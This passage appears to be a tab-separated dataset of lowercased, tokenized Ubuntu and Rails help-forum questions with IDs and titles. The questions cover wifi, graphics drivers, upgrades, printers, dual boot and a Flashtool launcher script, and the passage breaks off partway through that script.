366226	rails 3 : no route matches error	i am trying to create a simple form in rails 3 . but facing this issue : showing /home/praveen/rails_projects/mebay/app/views/ads/new.html.erb where line # 2 raised : no route matches { : action= > '' create '' , : new= > '' new '' , : controller= > '' ads '' } < h1 > new ad < /h1 > < % form_for @ ad , url : { action : `` create '' } do |f| % > < p > < b > name < /b > < % = f.text_field : name % > i am a beginner in rails but as per my understanding , there is some problems in the config/route.rb .. i have declared following routes in this file ... get 'ads/ : new'= > 'ads # new' get 'ads/ : create'= > 'ads # create' get 'ads/'= > 'ads # index' get 'ads/ : id'= > 'ads # show' last is the controller file where i have declared my functions : class adscontroller < applicationcontroller def new @ ad=ad.new end let me know if some more information is required .
366231	how to fix sketchup in wine when tool starts , but displays empty workspace ?	i 've installed wine 1.6 and winetricks in an linux mint 15 system , then downloaded the latest sketchup2013 'make ' windows-installer and installed through wine . i 've prepared the wine environment with starting as winearch=win32 , installed corefonts and ie8 and enabled the override for the 'riched20 ' libraries . ( i 've no idea what the last bit does , but it was advised in some guides . ) i 've also tried without these steps . only the win32 seems to make a difference , as the installer will complain about not finding sp2 otherwise . sketchup is installed successfully and starts , but displays an empty viewport . the program is responsive and everything works , it 's just that you ca n't see anything . i do n't get any opengl error and the registry entries seem fine , according to the opengl issue workarounds floating around the net . i still think it has something to do with opengl not working properly , maybe not in the wine environment , but in the linux system ? i 'm running on a lenovo w520 with nvida/intel hybrid cards , but only the nvida card is active and the properitary nvidia ( 319 ) drivers are installed . glxgears runs fine , but clamps at 2x the refresh rate . glxinfo outputs direct rendering : yes server glx vendor string : nvidia corporation server glx version string : 1.4 i 'm willing to try any linux or wine opengl tests to narrow down the problem , if you can offer any advise on what to use .
366232	how to use the raring/saucy netboot installer to install precise ?	we have a haswell motherboard with onboard ethernet controllers which are not supported in the precise ( 3.2 ) kernel . however , we 're using netboot installation , and we 'd really like to stick with the lts version . once the precise install is completed , we can install the linux-generic-lts-saucy package , which gets us the ethernet hardware support which is ultimately required . so , our options are : plug in a usb-ethernet ( or even wifi ) dongle , perform the install that way . modify the precise installer to somehow include the required driver ( a udeb , or some early_command invocation ? ) modify the raring installer ( 3.8 kernel , which supports the device ) to instead install precise . if it 's possible the third option seems like the simplest and most logical to me . now , we are already using the precise-updates installer ( aug 2013 ) , as opposed to the original april 2012 installer . however , the precise-updates installer still appears to use the 3.2 kernel . i 'm already comfortable with preseeding and modifying the netboot initrd . so my question is , can i somehow modify the raring/saucy netboot initrd to instead install precise ? thanks .
366234	no wifi using ubuntu on laptops	i have loaded ubuntu onto two different laptops and both had the same result ... no wifi . i could access the internet if i plugged into ethernet port but try as i might , i just could not access wifi . i even tried wine to install a windows based external usb wifi device but again ... nothing . it functioned normally in windows but with ubuntu installed ... .nothing and this was the same whether it installed just ubuntu or dual booted with windows . any suggestions ? thx !
366235	gdebi installation problem ( universal source )	i want to install gdebi package installer in ubuntu 12.04. when i open it in software centre its asking to use the universal source.i clicked to use the universal source but nothing open up.please reply fast.thanks in advance .
366236	wifi not working on dell inspiron 1564	hope you can offer some help ! i 'm new to ubuntu ( and linux for that matter ) , but i managed to install ubuntu 12.04 yesterday on an old dell inspiron 1564 laptop . everything works fine , with the exception of the wireless connection . using my wired ethernet , i was able to look up several solutions which seemed as if they would work , but i 've had no luck . currently , wireless does show as enabled , but all wireless networks are disconnected , in fact , none of the networks are even listed ( and i can see them on other devices in the home ) . let me know what you need to help me ! thanks in advance ! lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0c45:6461 microdia bus 002 device 005 : id 1058:0730 western digital technologies , inc . bus 002 device 004 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no
366238	how do i remove only shopping searches ?	i have a brand new 13.10 install and i want all this shopping spyware nonsense gone . searching for `` ubuntu shopping spyware nonsense '' led me to apt-get remove unity-lens-shopping but i do n't actually see a unity-lens-shopping package . how do i remove shopping searches in 13.10 ? update : is there any way to distinguish the scopes that search remote servers ( ebay , amazon , askubuntu ) from the ones that search my local computer ? or do i have to go through them all ?
366239	can not install cinnimon 2.xx	fetched 841 kb in 28s ( 29.3 kb/s ) w : gpg error : http : //packages.mate-desktop.org raring release : the following signatures could n't be verified because the public key is not available : no_pubkey 68980a0ea10b4de8 w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . userx @ bw : ~ $ how do i fix that ? how do i add a pubkey to get needed files to complete install of cinnamon ?
366243	13.04 to 13.10 upgrade hanging at `` installed fonts-ipafont-mincho ''	partway through my installation , the process just hangs at the message in the title . i 'm not sure it 's a good idea to halt the upgrade partway through the installation . any idea on how to fix this ? thanks .
366245	half-maximized windows misplaced after switching display	i have a laptop which i often plug into a larger screen with another display resolution . thus i 'm frequently changing the screen for the system to use . also i 've recently discovered the advantages of half-maximizing windows when working alternatingly in two or more applications . when changing screens , however the windows basically retain their absolute sizes and positions . so in my case the windows typically have their bottoms outside display , do n't fill up half the display , etc . i have to half-maximize the windows again every time i switch screens . i 'm thinking this should be subject of a bug report but i find it difficult to know where to file them . any ideas on what package is responsible ?
366246	how to uninstall ubuntu 12.04 from virtualbox 4.3	due to some difficulties encountered in using the currently installed ubuntu , iam trying to uninstall this ubuntu 12.04 from virtualbox 4.3 . my aim is to redo the whole installation process . iam using window 7 . i tried once by unistalling virtualbox through control panel , uninstall program . but after re installing again i find that the works done in ubuntu are still there . i wanted to start a fresh , please advice
366250	how to google chromebook webcam on a ubuntu osi	i have a google chromebook and i installed ubuntu and i would like to use the webcam that comes on the chromebook but i do n't know how to access it or install ubuntu drivers for the webcam . can anyone help me ?
366251	move data from one drive to another drive	i am using ubuntu 12.10 as a livecd in-order to move data from one drive to another drive because my previous os crashed and i do n't have my files backed up . unfortunately , it is in c : drive . so i request you all help me to move my files as i do n't have any info about ubuntu .
366255	gnu octave - question about graphs and plotting	i 've had task to do - to make an graphical interpretation of adding two functions together : sin ( 8x ) and multiplied -sign ( x ) in octave , as shown on image above . and i 've done that , but i do n't know how to get rid of these lines , which link up gaps between separated values ( for example , -1 and 1 ) . i do n't want them to be seen especially in third graph . to make helping me easier , i 'm going to tell you what i did : i made linear series of numbers , from -100 to 99 ( tempx ) . tempy = -sign ( tempx ) y1 = [ tempy tempy tempy tempy ] ( this line is kinda funny , if you know polish language ) creating y2 - sinus function y3 = y2 + y1 plotting , subplotting ... screenshot awaiting for instructions ...
366262	old toshiba shuts down while running make	i just installed ubuntu 12.04 on my old toshiba satellite a75 , completely replacing windows xp . the good news is that ubuntu changed this laptop from a doorstop to a nice machine for software development . the bad news is that it may not be nice enough . while running `` make '' to build a version of audacity , it shuts off suddenly and completely , as if i held the power button down . it boots back up ok , but i have to run `` make clean '' and start the make over again because of the partial .o files left by the shut-down . i thought this might be due to overheating , but i am not sure . it also happened when i was watching a youtube video in full screen mode . i checked the power settings and the system is set not to hibernate due to inactivity . any ideas out there ? thanks . warren
366269	dual pci video cards problem ubuntu 13.10	i just installed ubuntu 13.10 and i have 2 pci-e video cards ( geforce 8400 gs and geforce 7950 gt ) i have 2 monitors , 1 old samsung 14 '' plugged on the 8400gs vga port ( main pci-e ) and another 22 '' lg22ea53 plugged on geforce 7950 gt dvi port ( secondary pci-e ) . my 14 '' monitor has image , the 22 '' has no image . on the monitor config i can see the 22 '' , i can change its resolution , move it around , but it shows no image . the monitor itself understand that he is plugged ( when not plugged it blinks the power light , when plugged it keeps the power light always off , yes it is powered on and it identify that he is connected on dvi port ) looks like he is receiving `` black screen '' instead of image . if i try to change his position ( by default he is on right of the 14 '' monitor , but he 's actual position is on the left ) the screen gets all fuzzy for some time and then it logout and restore the default ... on system settings - > software and updates - > additional drivers it shows only the 8400gs . yesterday i was able to get the 7950gt to show on that additiona driver screen , but still no image , than i messed ups things and had to re-install ubuntu ... i tried to install bumblebee but couldnt configure it , tried envy nvidia but its outdated . when i type $ lshw -c video it gives me this : -display description : vga compatible controller product : g86 [ geforce 8400 gs ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : ea000000-eaffffff memory : e0000000-e7ffffff memory : e8000000-e9ffffff ioport:4000 ( size=128 ) -display description : vga compatible controller product : g71 [ geforce 7950 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : driver=nouveau latency=0 resources : irq:16 memory : ec000000-ecffffff memory : d0000000-dfffffff memory : eb000000-ebffffff ioport:3000 ( size=128 ) any suggestions on how do i make it work ? ! ? thank you guys ...
366272	is there any way to get tty than ctrl + alt + f ( 1-6 ) ?	after upgrade to 12.10 from 12.04 , my ubuntu freeze at black screen , i know because my amd/ati driver is broken and need to be reinstall . but i can not go to tty with ctrl + alt + f ( 1-6 ) method , so i can not use command line to follow some tutorial around here . i can login to grub , but after tried many way , it still go to freeze black screen . is there any way to get tty than ctrl + alt + f ? thank you .
366274	clean install to saucy reduces to low-graphics mode and flickering mouse cursor	my laptop used to work perfectly with ubuntu 13.04 but , after upgrading to 13.10 , i am greeted by a flickering underscore in the top left corner of a black screen instead of ligthdm . it quickly moves on to the low graphics mode dialogue and then , after i opt for low graphics mode , starts gdm ( which i installed ) . but the unity desktop i get from this has no mouse cursor ( although i can still click on things if i work out where the cursor should be ) and is very slow to animate the dash etc . my nvidia drivers are up to date , and the intel graphics driver seems to be installed as well so can anyone help me resolve this issue and get full hardware-accelerated graphics back ?
366275	development on an ubuntu tablet	for college , i program now and then in c , c++ , c # , java , lisp , python , sql , ... will it be possible to do development in ubuntu tablet environment in the same i can on ubuntu desktop ? ''
366276	how do i get xfce to show the desktop directory on the desktop instead of the home directory ?	i just installed xubuntu 13.10 . i replaced the desktop directory with a symlink to a directory on another partition ( i 've been doing this for a while ) . it worked fine at first , but then i did something that broke the mounting of the partition that desktop is on . after that , the desktop was showing the contents of the home directory . i fixed the mounting issue and rebooted . i can verify that the target of the desktop link is properly mounted and there , but the desktop still shows the contents of the home directory . how do i change it back ? ( found this , but it appears to be gnome-specific . )
366278	no default gui ?	i installed both the lasted ubuntu ( 13.10 ) and 12.04.3 and im getting an error during wubi installation . when i try and boot from by usb drive an error occurs saying there is no default gui and it asks for a boot command . any suggestions or tips ?
366280	ubuntu wont find my tranmission to download torrents	i recently installed ubuntu 12.04 and i cant download torrents . when i click the link to download and save a torrent file it doesnât give me an option to save the file it just asks me what program to open it with and i cant find transmission in all of my files to open it with . i 've tried removing transmission and re installing it and two other torrent programs ubuntu offered . when viewing the list of files on my computer to select one it doesnât even list any of the programs i have installed let alone the right one . it just asks me what program to open them with and gives me no viable options to use .
366281	unmet dependencies error when installing vlc	i can not install vlc media player . i get the following error when trying to install : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8-0ubuntu0.12.04.1 ) but 2.0.8-0ubuntu0.12.04.1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.5 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not going to be installed depends : libva1 ( > 1.0.15~ ) but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed please help me to solve this issue .
366282	problems downloading the packages xserver-xephyr	i tried various things to download xserver-xephyr package , all i got was various error messages . they are as follows : first through ubuntu software center then i tried the command : sudo apt-get install xserver-xephyr -- fix-missing then i tried downloading the .deb via firefox and installing it through gdebi . i also tried synaptic , which fails . so what shuold i do now ?
366283	how to install vmware player on ubuntu 12.10	i need help installing vmware player on my ubuntu 12.10 because i am having problem in installing virtualbox
366284	software center opens and closes	ubuntu 13.04 software center opens and then closes . this is the output when i try and run it from the terminal . i have tried removing and re-installing . any suggestions would be much appreciated . michael @ the-beast : ~ $ sudo software-center error : xdg_runtime_dir not set in the environment . 2013-10-26 12:51:42,384 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-10-26 12:51:42,622 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-10-26 12:51:42,623 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-10-26 12:51:42,627 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-10-26 12:51:42,627 - root - error - could not find any typelib for launchpadintegration ( software-center:12806 ) : ibus-warning ** : the owner of /home/michael/.config/ibus/bus is not root ! 2013-10-26 12:51:42,688 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1375 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1313 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 240 , in init_view vm.display_page ( self , self.pages.lobby , self.state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 183 , in display_page pane.enter_page ( page , view_state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 637 , in enter_page self.display_lobby_page ( state ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 652 , in display_lobby_page self._clear_search ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 559 , in _clear_search self.searchentry.clear_with_no_signal ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/searchentry.py '' , line 120 , in clear_with_no_signal self.handler_block ( self._handler_changed ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gobject.py '' , line 454 , in signal_handler_block gobjectmodule.signal_handler_block ( _get_instance_for_signal ( obj ) , handler_id ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 113 , in function return info.invoke ( *args , **kwargs ) typeerror : argument instance : expected gobject.object , but got pycobject
366288	applications keep opening everytime i relog into my xubuntu systetem	every time i login into my system , applications that are not set to automatically open keep opening anyways . such as , about two weeks ago i was doing something in users and groups , now , every time i log into my system , users and groups opens , even thought i 've closed it before restarting .
366290	ubuntu file/donwload/ssh server raid system help	two hard drives failure in two months , finally i think i should have a file server with raid 5 to protect my data . this server is mainly keeping all my pics , personal video , backup documents and movies , also its download machine and ssh server . so here is what i planning to do . fist of all , here is my hardware list , most of parts are from my old computer : cpu : amd 4850e motherboard : gigabyte ga-ma78gm-s2h with 5 x sata ii 3gb/s connectors memory : 4 gb ddr2 ( i need suggestion here , how many ram i need for this kind of server , i mean without swap only ram , i have 10gb ddr2 ram , i can put more if it needs it ) hdd : planning to buy 3 x 3tb wd red hdd ( use them to build raid 5 ) , also i have 2 x 2tb wd green hdd sata ii pci card : 4 x sata ii connectors i will install ubuntu on raid 5 drive , but i have not much knowledge of raid.so here is my quesitons . when hdd failure , ubuntu still functional ? can i login and access my data ? will ubuntu show me which hdd failure ? if i replace the failure hdd , is the recovery process automatic ? since i have other two 2tb old hdd , i am thinking how to use them after all . is it possible ubuntu to create 2 raid system ? raid 5 use new 3tb hdd , and raid 1 use my two old 2tb hdd . can ubuntu handle it ? if not , since my motherboard support raid 1 , maybe i can do this by my motherboard ? also in the future , if i need more space , can i buy more 3tb hdd to put on ? how ubuntu handle that ? thank you so much for your opinions . -kobe
366296	any way to recover lost mysql files after ubuntu reformat ?	i had to reformat my ubuntu device because seda was encrypted and i lost my keybord kernel . is there any way that i could recover them . i am wondering because when virtualbox reformats things , it keeps the old versions until space is needed . i was not sure if it had a different read only partition that only got changed by mysql or what . must work with linux .
366298	how to install brother dcp-8110dn laser printer on ubuntu ?	how to install brother dcp-8110dn laser printer on ubuntu ?
366303	how to install pulseaudio on ubuntu 13.10	i uninstalled pulseaudio because i was going to use alsa but i am having problems with that too . so i just want to get pulseaudio back .
366304	updated ubuntu 12.04 ... wireless is not working after that	i have new dell inspiron 15 lappy with ubuntu 12.04.updated it.but after updating , wireless is not working.i have qualcomm atheros wireless adaptor in it.please help .
366306	trying to install canon ip7250 printer	i 'm trying to install my canon ip7250 printer on a fresh install of 13:10 64bit . last time i installed it successfully via http : //handytutorial.com/install-canon-printer-driver-for-ubuntu-13-04-12-10-12-04 which entailed adding a repository via the terminal and then updating it . i then opened synaptic and searched for my printer model and synaptic then installed everything . this time round i added the repositories but the update failed with the following error : failed to fetch http : //ppa.launchpad.net/michael-gru ... amd64/packages 404 not found failed to fetch http : //ppa.launchpad.net/michael-gru ... -i386/packages 404 not found some index files failed to download . they have been ignored , or old ones used instead . an internet search failed to find another way of installing this printer so i 'm stuck . my laptop also runs 64 bit 13:10 and the printer works , as i installed it months ago . is there any way i can take something off that to use on this new machine ? thank you all in advance p.s . i have just found and downloaded the official canon driver from the canon website and extracted it , but i do n't know how to install it .
366307	how to reinstall graphics driver using live cd ?	my update to 13.10 stopped mid-way . now every time i turn on my laptop , ubuntu begins to load , i see a black screen with a mouse cursor for a few seconds , and then the screen stays black with a small white bar in the top left corner . recovery mode does n't seem to work properly either now . all the options freeze at /dev/sda1/ clean . every command i put in root shell prompt do not work either . would it be possible to reinstall my graphics via a live cd ?
366308	how to make `` xset s off '' survive a reboot ( 12.04 )	on an almost-fresh install of ubuntu 12.04 , after disabling screen turning off , screen lock , and suspension on inactivity from all the ( two ) places one can find under ubuntu 's system settings , the screen still turns black after some minutes of inactivity . i ca n't tell for sure whether it only becomes blank/black or turns off . i 've uninstalled gnome-screensaver , which did n't change anything . of the several answers i found out there ( most of which i did n't try because they were either unclear or reported to not work for everybody ) , i tried one that did work : sudo xset s off after which i left the computer unattended for hours and the screen never turned black , so it definitely worked . however it does not survive a reboot . after reboot , screen starts turning black again after n minutes of inactivity . given that `` xset s off '' does work until reboot , how do i make that setting permanent ? i guess i could create a script that runs at startup issuing that command , but i think that would be a horrible hack and there should be a cleaner way to accomplish this .
366310	do-release-upgrade does nothing after i answered a question	hi i have a laptop with the ubuntu 13.04 raring/ringtail and i 'm trying to upgrade it to ubuntu 13.10 saucy/salamander . so i entered to tty1 with ctrl+alt+f1 and typed sudo do-release-upgrade and everything went fine : downloaded packages , configured them , asked about overwriting some config files and so on . but now it asks me if i want to remove obsolete packages and of course ( i do n't want them to waste space ) i confirmed , but nothing is happening , if i hit enter a few times more the same question reapears continua [ sn ] detalls [ d ] ( that 's catalan ) . i tried everything : s , s , y , y , n , n , si , yes , etc . the only thing that works is d to show pakages but this is n't helping me . if i go back to the tty7 to see the processes on the gnome-system-monitor i have following : login - > bash - > sudo - > saucy with 0 cpu load on them what can i do ? should i kill the proces with ctrl+c ? or should i reboot ? or try different letters on the question ?
366312	i have the black screen after installing ati control center	i am new to ubuntu , and i tried to install the amd catalyst control center on ubuntu 13.04 , but after installing i ca n't do anything because it only shows me the black screen . what can i do ? please help me .
366315	broadcom bluetooth usb dongle not working in 13.10	here is the problem . i installed ubuntu 13.10 on windows 7 , after the install my plug and play bluetooth dongle is not working . if i go to settings > bluetooth ( when the dongle is not plugged in ) bluetooth and visibility stay greyed ( unclickable ) . now if i insert the usb dongle , only the bluetooth option is clickable to on/off ( visible still remains unclickable ) . if i turn on the bluetooth , still nothing happens . it neither detects anything/nor gives up an error . it just stays stuck with nothing happening . before posting i did searched the net but could n't find anything that works . here is the output of lsusb bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 004 : id 0a5c:2045 broadcom corp. bluetooth controller bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 05ca:18b3 ricoh co. , ltd sony vaio integrated webcam bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub please help ... . ! ! ! ! ! ! ! !
366316	my bsnl zte datacard is not detected by ubuntu !	i have tried with many other devices , connecting using all of them was so easy . but this time it failed ! the system is not showing such a device at all in the new connections window ! any fix please.. !
366318	screen flickering after forced termination	after a forced termination of ubuntu ( battery on laptop died while on suspend mode ) the screen seems to flicker a little bit . it is not a very intense flicker , more like a rectangular of 3 fingers width that flickers while the rest of the screen , the center part , works properly . i 'm a starter user so i want to know how to check the drivers or make a repair . it does n't really seem like a hardware issue . my graphics card model is radeon hd 6520g and i ca n't find any support for it
366322	using ubuntu 12.04 lts but also have windows 7 on same computer- how to i wipe windows ?	i installed ubuntu 12.04 lts using the windows installer , but now would just like to remove windows altogether . what is the best way to do this ? is there a way to do this other than using a cd/cvd or usb ?
366324	dvd mount error	i get this error , when trying to play a dvd . error mounting : mount exited with exit code 1 : helper failed with : mount : mount point /media/cdrom/ does not exist can anyone help ? thanks a lot
366325	problems while installing ubuntu on hp envy 17-j050	i had several issues while trying to install ubuntu ( x64 ) on the new laptop that i just bought : hp envy 17-j050ex ( specs ) . i will not raising the common issues about dual-boot , secure boot , setting the brightness during install , downloading drivers , and the other related issues that are relatively `` easy '' to google and solve . the most annoying problem is that latest ubuntu version that can be installed on it is 12.04 ! all newer version installers hanged in the middle of the `` trial '' most of the time with no information at all and some times with the information that the `` no screen found '' error . even after installing the 12.04 many issues are still not solved : 2.1 . wireless ( ralink rt3290 ) is disabled by hardware switch : i tried the rfkill unblock all , rebooting with the rescue mode and even going into windows to try to enable the wireless . the only hardware switch on my laptop is the f12 key that is not working at all in enabling/disabling under ubuntu ( but works on win8 ) 2.2 . the nvidia geforce 750m is not detected/installed correctly even after installing the nvidia-current nor downloading the nvidia*.run and installing it from root . 2.3 . the brightness can not be changed using the fn keys f2 and f3 while the volume up/down/mute ( f7/f8/f6 ) is working along with the keyboard backlight ( f5 ) . and if i try to toggle the wifi on/off , these function button stop working unless i restart x . please let me know if my week long research missed the ways to solve these issues . thanks for your time . ***edit : after updating the wireless drivers from the win8 hp support app , it seemed that the wireless is up and running without any other intervention what so ever ! i first noticed it while on linux mint 15 that the bluetooth was disabled and there is a button for enabling it along with the wifi . so issue 2.1 ok and still waiting for some clues for the rest .
366330	display question	i 'm using a laptop with a monitor attached but i do n't want two separate views . i looked in the display options and changed to mirrored . it worked but now the resolution is off . it only has two options . is there a way to get more resolution options ? a package i can download perhaps ?
366332	is it possible to update ubuntu-phone dailys without wiping userdata ?	i want to test ubuntu phone and report bugs . but for that i need the daily images and i need to use my phone more or less productively . so it 's not satisfying to loose my userdata every day . can you please help or show me a place where i can find the information ? regards samuel
366333	windows fails to load after ubuntu install , grub issue	i recently install ubuntu 13.10 in dual boot with windows 7. when i startup grub loads fine , and so does ubuntu . but if i select windows from grub i get an error message , something like : windows failed to start . a recent hardware or software < bla bla bla ... > error code : `` 0xc000000f '' my workaround : i reverted the mbr to a backup i created before installing ubuntu . now windows loads ok. ( no grub or ubuntu available now of course ... ) so this is obviously an issue with grub not loading windows properly , but i have no clue how to fix it . : ( additional info : hp folio 9470m sdd hard-drive windows seems to startup from a small partition ( 102mb ) labelled `` boot '' on the beginning of the hard drive .
366334	where the system font size is stored in notify-osd	we are working on fixing the bug in ubuntu the bug on which we are working is notification uses wrong text size so we need to know where the system font size is stored in the notify-osd package
366335	i have installed ubuntu 12.04 lts in preinstalled win8 . but at the time of booting it automatically boots w8 without giving any option to boot ubuntu	i have a laptop with windows 8 pre-installed . i have sucessfully installed ubuntu lts . but at the boot time win8 starts automatically without giving any option to boot ubuntu . what should i do ? ? ? ?
366336	how do i install libusbx library	i am trying to run flashtool ( flashing utility for android phones ) in ubuntu . already setup java and appropriate environment on execution the following error comes up rajeswar @ webe-pcl : ~ $ flashtool/flashtool not running as root but sony/sonyericcson vendor id found on your udev rules if flashing did n't work well , run flashtool as root libusb.libusbexception : libusb not found . minimum libusb version is 1.0.15 . it can be downloaded on http : //www.libusbx.org at libusb.usbsystem.initsystem ( usbsystem.java:28 ) at libusb.usbsystem. < init > ( usbsystem.java:15 ) at linuxlib.jusb.init ( jusb.java:21 ) at gui.main.initlinuxusb ( main.java:47 ) at gui.main.main ( main.java:34 ) so i downloaded the latest version from http : //libusbx.org/ , after extraction executed ./configure & & sudo make & & sudo make install & & sudo ldconfig . it executed successfully & installed to /usr/local/lib/.. but the error keeps coming.. this is output of sudo ldconfig -vp | grep usb libusbmuxd.so.2 ( libc6 , x86-64 ) = > /usr/lib/libusbmuxd.so.2 libusb-1.0.so.0 ( libc6 , x86-64 ) = > /usr/local/lib/libusb-1.0.so.0 libusb-1.0.so.0 ( libc6 , x86-64 ) = > /lib/x86_64-linux-gnu/libusb-1.0.so.0 libusb-1.0.so ( libc6 , x86-64 ) = > /usr/local/lib/libusb-1.0.so libusb-0.1.so.4 ( libc6 , x86-64 ) = > /lib/x86_64-linux-gnu/libusb-0.1.so.4 libusb-0.1.so.4 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libusb-0.1.so.4 libgusb.so.2 ( libc6 , x86-64 ) = > /usr/lib/x86_64-linux-gnu/libgusb.so.2 any idea how to fix it ? below is content of flashtool launcher script # ! /bin/sh export basedir= $ ( dirname $ 0 ) export system64= $ ( uname -m ) export os= $ ( uname -s ) cd $ basedir if test `` $ os '' = `` linux '' then chmod 755 ./x10flasher_lib/adb.linux chmod 755 ./x10flasher_lib/fastboot.linux chmod 755 ./x10flasher_lib/unyaffs.linux chmod 755 ./x10flasher_lib/bin2elf chmod 755 ./x10flasher_lib/bin2sin if [ `` $ ( whoami ) '' ! = `` root '' ] then export hasrules= '' false '' if test -d /etc/udev/rules.d then if grep -rl `` 0fce '' /etc/udev/rules.d > /dev/null then export hasrules= '' true '' fi fi if test `` $ hasrules '' = `` true '' then echo `` not running as root but sony/sonyericcson vendor id found on your udev rules '' echo `` if flashing did n't work well , run flashtool as root '' else echo `` not running as root and there is no sony/sonyericcson vendor id on your udev rules '' echo `` the user must be granted access to adb/flashmode/fastboot '' echo `` if you are unsure what to do , run flashtool as root '' exit 1 fi else echo `` running as root . '' fi if test -z `` $ { java_home } '' then if test `` $ { system64 } '' = `` x86_64 '' then export java_home=./x10flasher_lib/linjre64 else export java_home=./x10flasher_lib/linjre32 fi echo `` java_home not set . using default value : $ { java_home } '' fi if test -e $ { java_home } /bin/java then export ld_library_path=./x10flasher_lib/linux/lib32 export ld_library_path=./x10flasher_lib/linux/lib64 : $ ld_library_path ln -sf libusbx-1.0.so.0.1.0 ./x10flasher_lib/linux/lib32/libusbx-1.0.so ln -sf libusbx-1.0.so.0.1.0 ./x10flasher_lib/linux/lib64/libusbx-1.0.so isjava6= $ ( $ java_home/bin/java -version 2 > & 1|grep version|grep 1.6|wc -l ) isjava7= $ ( $ java_home/bin/java -version 2 > & 1|grep version|grep 1.7|wc -l ) isjava64= $ ( $ java_home/bin/java -version 2 > & 1|grep 64-bit|wc -l ) if test $ isjava6 -gt 0 -o $ isjava7 -gt 0 then if test $ isjava64 -gt 0 then ln -sf swt64.jar ./x10flasher_lib/swtlin/swt.jar else ln -sf swt32.jar ./x10flasher_lib/swtlin/swt.jar fi $ java_home/bin/java -xms128m -xmx512m -duser.country=us -duser.language=en -jar x10flasher.jar else echo `` java version must be 1.6 or 1.7 '' fi else echo `` no java in specified path in java_home= $ { java_home } '' echo `` set the variable to a valid java installation '' fi else chmod 755 ./x10flasher_lib/adb.mac chmod 755 ./x10flasher_lib/fastboot.mac chmod 755 ./x10flasher_lib/unyaffs.mac export dyld_library_path=./x10flasher_lib/mac/lib64 : $ dyld_library_path export dyld_library_path=./x10flasher_lib/mac/lib32 : $ dyld_library_path ln -sf libusbx-1.0.0.dylib ./x10flasher_lib/mac/lib64/libusbx-1.0.dylib ln -sf libusbx-1.0.0.dylib ./x10flasher_lib/mac/lib32/libusbx-1.0.dylib isjava6= $ ( java -version 2 > & 1|grep version|grep 1.6|wc -l ) isjava7= $ ( java -version 2 > & 1|grep version|grep 1.7|wc -l ) isjava64= $ ( java -version 2 > & 1|grep 64-bit|wc -l ) if test $ isjava64 -gt 0 then ln -sf swt64.jar ./x10flasher_lib/swtmac/swt.jar else 